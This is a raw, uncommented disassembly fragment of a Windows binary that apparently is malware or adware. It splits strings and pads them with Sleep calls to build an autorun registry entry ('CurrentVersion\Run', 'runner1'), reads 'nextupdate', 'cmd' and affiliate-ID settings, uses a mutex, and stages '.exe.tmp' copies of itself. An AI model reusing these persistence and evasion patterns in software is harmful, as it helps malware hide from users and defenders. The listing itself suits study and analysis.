loc_4251ED: ; CODE XREF: sub_4251CE+16�j
; sub_4251CE+3A�j
inc eax
loc_4251EE: ; CODE XREF: sub_4251CE+1B�j
mov cl, [eax]
test cl, cl
jz short loc_42520A
cmp cl, 30h
jl short loc_42520A
cmp cl, 39h
jg short loc_42520A
movsx ecx, cl
lea esi, [esi+esi*4]
lea esi, [ecx+esi*2-30h]
jmp short loc_4251ED
; ---------------------------------------------------------------------------
loc_42520A: ; CODE XREF: sub_4251CE+24�j
; sub_4251CE+29�j ...
cmp dl, 1
jnz short loc_425211
neg esi
loc_425211: ; CODE XREF: sub_4251CE+3F�j
push 24h
call dword_4330E0 ; Sleep
mov eax, esi
pop esi
retn 4
sub_4251CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42521F proc near ; CODE XREF: sub_424AE5+1AF�p
var_84 = byte ptr -84h
var_83 = byte ptr -83h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
push edi
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_83]
push 1
rep stosd
stosw
stosb
pop edi
xor esi, esi
push edi
mov [ebp+var_4], esi
call dword_4330E0 ; Sleep
cmp [ebp+arg_0], esi
mov ebx, [ebp+arg_4]
jnz short loc_42525B
dec [ebp+arg_8]
mov byte ptr [ebx], 30h
mov [ebp+var_4], edi
loc_42525B: ; CODE XREF: sub_42521F+31�j
and [ebp+var_84], 0
cmp [ebp+arg_0], 0
jz short loc_42529F
loc_425268: ; CODE XREF: sub_42521F+7B�j
mov eax, [ebp+arg_0]
push 0Ah
xor edx, edx
pop ecx
div ecx
lea edi, [ebp+esi+var_84]
push 1
mov ebx, edx
mov [edi], bl
call dword_4330E0 ; Sleep
mov eax, [ebp+arg_0]
push 0Ah
xor edx, edx
pop ecx
div ecx
add bl, 30h
inc esi
mov [edi], bl
test eax, eax
mov [ebp+arg_0], eax
jnz short loc_425268
mov ebx, [ebp+arg_4]
loc_42529F: ; CODE XREF: sub_42521F+47�j
mov ecx, [ebp+arg_8]
cmp ecx, esi
jle short loc_4252C7
sub ecx, esi
lea edi, [ebp+esi+var_84]
mov [ebp+arg_0], ecx
mov edx, ecx
mov eax, 30303030h
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
add esi, edx
rep stosb
loc_4252C7: ; CODE XREF: sub_42521F+85�j
dec esi
js short loc_4252DF
loc_4252CA: ; CODE XREF: sub_42521F+BE�j
mov al, [ebp+esi+var_84]
mov ecx, [ebp+var_4]
dec esi
inc [ebp+var_4]
test esi, esi
mov [ecx+ebx], al
jge short loc_4252CA
loc_4252DF: ; CODE XREF: sub_42521F+A9�j
mov eax, [ebp+var_4]
push 7
and byte ptr [eax+ebx], 0
call dword_4330E0 ; Sleep
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn 0Ch
sub_42521F endp
; =============== S U B R O U T I N E =======================================
sub_4252F7 proc near ; CODE XREF: sub_425FC6+199�p
mov eax, offset loc_4320F4
call sub_43176A ; _EH_prolog
sub esp, 38h
push esi
push edi
mov edi, ecx
lea ecx, [ebp-10h]
mov dword ptr [ebp-4], 1
call sub_43164E
push offset aSoftwareMicros ; "SOFTWARE\\Microso"
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 2
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset aFtWindowsCurre ; "ft\\Windows\\Curren"
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aTversionR ; "tVersion\\R"
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aUnRu ; "un\\ru"
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aNner1 ; "nner1"
lea ecx, [ebp-10h]
call sub_431678
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset aDefaultvalue ; "defaultvalue"
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-1Ch], esp
push eax
mov byte ptr [ebp-4], 3
call sub_431636
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 2
call sub_42692B
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_43164E
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 5
call sub_43164E
lea eax, [ebp-1Ch]
lea ecx, [ebp-44h]
push eax
mov byte ptr [ebp-4], 6
call sub_426D5C
lea eax, [ebp-1Ch]
lea ecx, [ebp-18h]
push eax
mov byte ptr [ebp-4], 7
call sub_431648
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 6
call sub_431642
lea eax, [ebp+8]
push offset asc_4373A8 ; " "
push eax
lea eax, [ebp-20h]
push eax
call sub_43165A
lea ecx, [ebp+0Ch]
mov byte ptr [ebp-4], 8
push ecx
push eax
lea eax, [ebp-1Ch]
push eax
call sub_431654
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 9
call sub_431648
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 8
call sub_431642
lea ecx, [ebp-20h]
mov byte ptr [ebp-4], 6
call sub_431642
push dword ptr [ebp-14h]
push dword ptr [ebp-18h]
call dword_433204 ; _mbscmp
pop ecx
test eax, eax
pop ecx
jz short loc_42545E
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-24h], esp
push eax
call sub_431636
lea ecx, [ebp-44h]
call sub_426DB8
loc_42545E: ; CODE XREF: sub_4252F7+14E�j
push ecx
lea eax, [ebp+0Ch]
mov ecx, esp
mov [ebp-24h], esp
push eax
call sub_431636
mov ecx, edi
call sub_425AD2
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 5
call sub_431642
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 2
call sub_426ABF
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_431642
and byte ptr [ebp-4], 0
lea ecx, [ebp+8]
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+0Ch]
call sub_431642
mov ecx, [ebp-0Ch]
pop edi
mov al, 1
mov large fs:0, ecx
pop esi
leave
retn 8
sub_4252F7 endp
; =============== S U B R O U T I N E =======================================
sub_4254CE proc near ; CODE XREF: sub_42852F+23F�p
mov eax, offset loc_43213F
call sub_43176A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_43164E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aWr ; "WR"
mov [ebp-4], ebx
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push 23h
call esi ; Sleep
push offset aConfi ; "confi"
lea ecx, [ebp-10h]
call sub_431678
push 23h
call esi ; Sleep
push offset aGversion ; "gversion"
lea ecx, [ebp-10h]
call sub_431678
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_439CA0
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_431636
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_42692B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_426D5C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_431636
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_426ABF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_4254CE endp
; =============== S U B R O U T I N E =======================================
sub_4255E6 proc near ; CODE XREF: sub_4294E5+6E�p
; sub_4294E5+12B�p ...
mov eax, offset loc_43215C
call sub_43176A ; _EH_prolog
sub esp, 28h
push esi
push edi
lea ecx, [ebp-10h]
call sub_43164E
and dword ptr [ebp-4], 0
push offset aWr ; "WR"
lea ecx, [ebp-10h]
call sub_43163C
mov esi, dword_4330E0
push 22h
pop edi
push edi
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push edi
call esi ; Sleep
push offset aNex ; "nex"
lea ecx, [ebp-10h]
call sub_431678
push edi
call esi ; Sleep
push offset aTup ; "tup"
lea ecx, [ebp-10h]
call sub_431678
push edi
call esi ; Sleep
push offset aDate ; "date"
lea ecx, [ebp-10h]
call sub_431678
push 80000000h
push 1
push 0
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-14h], esp
push eax
call sub_431636
lea ecx, [ebp-34h]
call sub_426584
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 1
call sub_426816
mov edi, [ebp+8]
mov esi, eax
test edi, edi
jle short loc_42569F
lea eax, [ebp+8]
push eax
call dword_4331A4 ; time
mov eax, [ebp+8]
pop ecx
lea esi, [eax+edi]
jmp short loc_4256B7
; ---------------------------------------------------------------------------
loc_42569F: ; CODE XREF: sub_4255E6+A4�j
test esi, esi
jnz short loc_4256C0
lea eax, [ebp+8]
push eax
call dword_4331A4 ; time
mov eax, [ebp+8]
pop ecx
lea esi, [eax+0B4h]
loc_4256B7: ; CODE XREF: sub_4255E6+B7�j
push esi
lea ecx, [ebp-34h]
call sub_426843
loc_4256C0: ; CODE XREF: sub_4255E6+BB�j
and byte ptr [ebp-4], 0
lea ecx, [ebp-34h]
call sub_4266D6
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-10h]
call sub_431642
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
mov large fs:0, ecx
pop esi
leave
retn 4
sub_4255E6 endp
; =============== S U B R O U T I N E =======================================
sub_4256EA proc near ; CODE XREF: sub_422A1E+163�p
arg_0 = dword ptr 4
push ebx
push esi
push [esp+8+arg_0]
mov esi, ecx
push 0
push 0
call dword_4330B0 ; CreateMutexA
add esi, 0Ch
test eax, eax
mov [esi], eax
jz short loc_42571D
call dword_433028 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_42571D
push dword ptr [esi]
call dword_433020 ; CloseHandle
and dword ptr [esi], 0
loc_42571D: ; CODE XREF: sub_4256EA+19�j
; sub_4256EA+26�j
cmp dword ptr [esi], 0
lea ecx, [esp+8+arg_0]
setz bl
call sub_431642
mov al, bl
pop esi
pop ebx
retn 4
sub_4256EA endp
; =============== S U B R O U T I N E =======================================
sub_425733 proc near ; CODE XREF: sub_42852F+1A9�p
mov eax, offset loc_4321A7
call sub_43176A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_43164E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aWr ; "WR"
mov [ebp-4], ebx
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aP_1 ; "p"
lea ecx, [ebp-10h]
call sub_431678
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_439CA0
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_431636
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_42692B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_426D5C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_431636
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_426ABF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_425733 endp
; =============== S U B R O U T I N E =======================================
sub_42583A proc near ; CODE XREF: sub_42852F+172�p
mov eax, offset loc_4321F3
call sub_43176A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_43164E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aW ; "W"
mov [ebp-4], ebx
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_431678
push 24h
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aI_0 ; "i"
lea ecx, [ebp-10h]
call sub_431678
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_439CA0
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_431636
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_42692B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_426D5C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_431636
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_426ABF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_42583A endp
; =============== S U B R O U T I N E =======================================
sub_425952 proc near ; CODE XREF: sub_4245AA+2E2�p
mov eax, offset loc_432240
call sub_43176A ; _EH_prolog
sub esp, 34h
push esi
and dword ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_43164E
push offset aW ; "W"
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_431678
push 24h
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aI_0 ; "i"
lea ecx, [ebp-10h]
call sub_431678
mov eax, [ebp+8]
mov eax, [eax-8]
cmp eax, 3
jl loc_425AAB
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-1Ch], esp
push offset byte_439CA0
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-18h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_431636
lea ecx, [ebp-40h]
mov byte ptr [ebp-4], 1
call sub_42692B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_426D5C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
lea eax, [ebp-14h]
push offset asc_437428 ; ","
push eax
lea eax, [ebp-1Ch]
push eax
call sub_43165A
lea ecx, [ebp+8]
mov byte ptr [ebp-4], 6
push ecx
push eax
lea eax, [ebp-18h]
push eax
call sub_431654
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 7
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 6
call sub_431642
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 4
call sub_431642
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-20h], esp
push eax
call sub_431636
lea ecx, [ebp-40h]
call sub_426DB8
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-40h]
mov byte ptr [ebp-4], 1
call sub_426ABF
loc_425AAB: ; CODE XREF: sub_425952+6D�j
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn 4
sub_425952 endp
; =============== S U B R O U T I N E =======================================
sub_425AD2 proc near ; CODE XREF: sub_4252F7+178�p
mov eax, offset loc_43227C
call sub_43176A ; _EH_prolog
sub esp, 30h
push esi
and dword ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_43164E
push offset aW ; "W"
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_431678
push 24h
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aCmd_0 ; "cmd"
lea ecx, [ebp-10h]
call sub_431678
push 80000000h
push 1
push ecx
mov esi, offset a0 ; "0"
mov ecx, esp
mov [ebp-18h], esp
push esi
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-1Ch], esp
push eax
mov byte ptr [ebp-4], 2
call sub_431636
lea ecx, [ebp-3Ch]
mov byte ptr [ebp-4], 1
call sub_42692B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea eax, [ebp-18h]
lea ecx, [ebp-3Ch]
push eax
mov byte ptr [ebp-4], 4
call sub_426D5C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
push esi
push dword ptr [ebp-14h]
call dword_433204 ; _mbscmp
pop ecx
test eax, eax
pop ecx
jnz short loc_425BCC
push ecx
lea eax, [ebp+8]
mov ecx, esp
mov [ebp-1Ch], esp
push eax
call sub_431636
lea ecx, [ebp-3Ch]
call sub_426DB8
loc_425BCC: ; CODE XREF: sub_425AD2+E1�j
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-3Ch]
mov byte ptr [ebp-4], 1
call sub_426ABF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn 4
sub_425AD2 endp
; =============== S U B R O U T I N E =======================================
sub_425C0B proc near ; CODE XREF: sub_42908F+70�p
mov eax, offset loc_4322C7
call sub_43176A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_43164E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aW ; "W"
mov [ebp-4], ebx
call sub_43163C
mov esi, dword_4330E0
push 24h
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_431678
push 24h
call esi ; Sleep
push offset dword_43710C
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aC ; "c"
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push offset aMd ; "md"
lea ecx, [ebp-10h]
call sub_431678
push 22h
call esi ; Sleep
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_439CA0
call sub_43162A
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_431636
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_42692B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_43164E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_426D5C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_431648
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_431642
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_431636
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_431642
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_426ABF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_431642
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_425C0B endp
; =============== S U B R O U T I N E =======================================
sub_425D38 proc near ; CODE XREF: sub_425FC6+5C�p
mov eax, offset loc_4322EC
call sub_43176A ; _EH_prolog
mov eax, 8020h
call sub_431700
push ebx
push esi
push edi
mov [ebp-18h], ecx
xor ebx, ebx
lea ecx, [ebp-1Ch]
mov [ebp-4], ebx
call sub_43164E
push dword ptr [ebp+8]
mov esi, dword_4330CC
lea eax, [ebp-602Ch]
mov byte ptr [ebp-4], 1
push eax
call esi ; lstrcpyA
lea eax, [ebp-602Ch]
push eax
call dword_4330B4 ; lstrlenA
mov ecx, [ebp-18h]
push eax
lea eax, [ebp-602Ch]
push eax
lea eax, [ebp-10h]
push eax
call sub_42309C
push eax
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 2
call sub_431648
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_431642
push dword ptr [ebp-1Ch]
lea eax, [ebp-402Ch]
push eax
call dword_433298 ; wsprintfA
cmp byte ptr [ebp-402Ch], 23h
pop ecx
pop ecx
jnz loc_425F9C
push ebx
lea eax, [ebp-402Ch]
push 1
push eax
lea eax, [ebp-10h]
lea ecx, [ebp-14h]
push eax
call sub_421ACF
push dword ptr [eax]
lea eax, [ebp-402Ch]
push eax
call sub_431758 ; strcpy
pop ecx
pop ecx
lea ecx, [ebp-10h]
call sub_431642
lea eax, [ebp-402Ch]
push 23h
push eax
lea ecx, [ebp-14h]
call sub_421A20
mov edi, eax
cmp edi, ebx
mov [ebp-10h], edi
jz loc_425F9C
jmp short loc_425E1F
; ---------------------------------------------------------------------------
loc_425E1C: ; CODE XREF: sub_425D38+25E�j
mov edi, [ebp-10h]
loc_425E1F: ; CODE XREF: sub_425D38+E2�j
cmp edi, 0FFFFFFFFh
jnz short loc_425E36
lea eax, [ebp-402Ch]
push eax
lea eax, [ebp-202Ch]
push eax
call esi ; lstrcpyA
jmp short loc_425E5E
; ---------------------------------------------------------------------------
loc_425E36: ; CODE XREF: sub_425D38+EA�j
push edi
lea eax, [ebp-402Ch]
push ebx
push eax
lea eax, [ebp-28h]
lea ecx, [ebp-14h]
push eax
call sub_421ACF
push dword ptr [eax]
lea eax, [ebp-202Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-28h]
call sub_431642
loc_425E5E: ; CODE XREF: sub_425D38+FC�j
inc edi
push ebx
lea eax, [ebp-402Ch]
push edi
push eax
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-14h]
call sub_421ACF
push dword ptr [eax]
lea eax, [ebp-402Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-20h]
call sub_431642
lea eax, [ebp-202Ch]
push 3Ah
push eax
lea ecx, [ebp-14h]
call sub_421A20
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_425EF2
push edi
lea eax, [ebp-202Ch]
push ebx
push eax
lea eax, [ebp-24h]
lea ecx, [ebp-14h]
push eax
call sub_421ACF
push dword ptr [eax]
lea eax, [ebp-802Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-24h]
call sub_431642
inc edi
push ebx
lea eax, [ebp-202Ch]
push edi
push eax
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-14h]
call sub_421ACF
push dword ptr [eax]
lea eax, [ebp-202Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-2Ch]
call sub_431642
jmp short loc_425F17
; ---------------------------------------------------------------------------
loc_425EF2: ; CODE XREF: sub_425D38+165�j
lea eax, [ebp-202Ch]
push eax
lea eax, [ebp-802Ch]
push eax
call esi ; lstrcpyA
push 2000h
lea eax, [ebp-202Ch]
push ebx
push eax
call sub_431752 ; memset
add esp, 0Ch
loc_425F17: ; CODE XREF: sub_425D38+1B8�j
push 5
lea eax, [ebp-802Ch]
push offset aAffid ; "affID"
push eax
call dword_4331AC ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_425F7A
lea eax, [ebp-202Ch]
push eax
call sub_43175E ; strlen
cmp eax, 1
pop ecx
jle short loc_425F5F
push 8Fh
mov [ebp+eax-202Dh], bl
call dword_4330E0 ; Sleep
lea eax, [ebp-202Ch]
push eax
jmp short loc_425F6F
; ---------------------------------------------------------------------------
loc_425F5F: ; CODE XREF: sub_425D38+20A�j
push 0C2h
call dword_4330E0 ; Sleep
push offset byte_439CA0
loc_425F6F: ; CODE XREF: sub_425D38+225�j
mov eax, [ebp-18h]
lea ecx, [eax+4]
call sub_43163C
loc_425F7A: ; CODE XREF: sub_425D38+1F8�j
cmp dword ptr [ebp-10h], 0FFFFFFFFh
jz short loc_425F9C
lea eax, [ebp-402Ch]
push 23h
push eax
lea ecx, [ebp-14h]
call sub_421A20
cmp eax, ebx
mov [ebp-10h], eax
jnz loc_425E1C
loc_425F9C: ; CODE XREF: sub_425D38+90�j
; sub_425D38+DC�j ...
lea ecx, [ebp-1Ch]
mov [ebp-4], bl
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_425D38 endp
; =============== S U B R O U T I N E =======================================
sub_425FC6 proc near ; CODE XREF: sub_4294E5+59�p
mov eax, offset loc_432388
call sub_43176A ; _EH_prolog
sub esp, 68h
push ebx
push esi
push edi
mov edi, ecx
mov esi, dword_4330E0
and dword ptr [ebp-4], 0
push 0CEAh
call esi ; Sleep
lea ecx, [ebp-14h]
call sub_43164E
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_43164E
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_43164E
push 24h
mov byte ptr [ebp-4], 3
call esi ; Sleep
push ecx
lea eax, [ebp+8]
mov ecx, esp
mov [ebp-30h], esp
push eax
call sub_431636
mov ecx, edi
call sub_425D38
lea ebx, [edi+1Ch]
push offset aM ; "\\m"
lea eax, [ebp-2Ch]
push ebx
push eax
call sub_43165A
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 4
call sub_431648
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 3
call sub_431642
push 24h
call esi ; Sleep
push offset aRo ; "ro"
lea ecx, [ebp-14h]
call sub_431678
push 24h
call esi ; Sleep
push offset aFinu ; "finu"
lea ecx, [ebp-14h]
call sub_431678
push 22h
call esi ; Sleep
lea eax, [edi+4]
push offset a_ex ; ".ex"
push eax
lea eax, [ebp-2Ch]
push eax
call sub_43165A
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 5
call sub_431684
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 3
call sub_431642
push offset aE ; "e"
lea ecx, [ebp-14h]
call sub_431678
push ebx
lea ecx, [ebp-18h]
call sub_431648
mov ebx, offset dword_43710C
lea ecx, [ebp-18h]
push ebx
call sub_431678
push 23h
call esi ; Sleep
push offset aMr ; "mr"
lea ecx, [ebp-18h]
call sub_431678
push 24h
call esi ; Sleep
push offset aOf ; "of"
lea ecx, [ebp-18h]
call sub_431678
lea eax, [edi+4]
push eax
lea eax, [ebp-28h]
push offset aInu ; "inu"
push eax
call sub_43167E
push offset a_exe_tmp ; ".exe.tmp"
push eax
lea eax, [ebp-2Ch]
mov byte ptr [ebp-4], 6
push eax
call sub_43165A
push eax
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 7
call sub_431684
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 6
call sub_431642
lea ecx, [ebp-28h]
mov byte ptr [ebp-4], 3
call sub_431642
push 22h
call esi ; Sleep
push ecx
lea eax, [ebp+8]
mov ecx, esp
mov [ebp-30h], esp
push eax
call sub_431636
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-2Ch], esp
push eax
mov byte ptr [ebp-4], 8
call sub_431636
mov ecx, edi
mov byte ptr [ebp-4], 3
call sub_4252F7
push dword ptr [edi+20h]
push dword ptr [ebp-14h]
call dword_433204 ; _mbscmp
pop ecx
test eax, eax
pop ecx
jz short loc_4261CD
push dword ptr [ebp-18h]
call sub_4221DB
test eax, eax
pop ecx
jz short loc_42618F
push 1
push dword ptr [ebp-18h]
call sub_421C92
pop ecx
pop ecx
loc_42618F: ; CODE XREF: sub_425FC6+1BB�j
